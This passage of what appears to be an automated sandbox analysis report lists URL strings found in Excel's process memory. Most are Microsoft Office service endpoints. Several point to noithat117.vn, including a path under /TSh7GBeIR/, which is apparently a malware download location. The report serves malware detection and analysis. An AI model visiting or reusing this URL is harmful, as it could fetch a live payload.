Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizey
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize~
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://management.azure.com
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://management.azure.com/
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
Source: EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://messaging.office.com/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://metadata.templates.cdn.office.net/client/logE
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech&Jg
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000003.258160231.0000000013176000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253825820.000000001317E000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com/nexus/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules#
Source: EXCEL.EXE, 00000000.00000003.258140195.000000001313E000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com_
Source: EXCEL.EXE, 00000000.00000002.574021923.0000000002ED0000.00000004.00000020.sdmp	String found in binary or memory: https://nexus.officeapps.live.comcial
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/N_k
Source: EXCEL.EXE, 00000000.00000003.487737104.0000000013176000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/TSh7GBeIR/tiynh.html
Source: EXCEL.EXE, 00000000.00000003.487737104.0000000013176000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/TSh7GBeIR/tiynh.htmlx
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/dZ
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/#
Source: EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253229724.00000000131DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450902913.00000000131DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253731325.00000000131DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258226371.00000000131DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com0=
Source: EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comV
Source: EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comh
Source: EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.coms
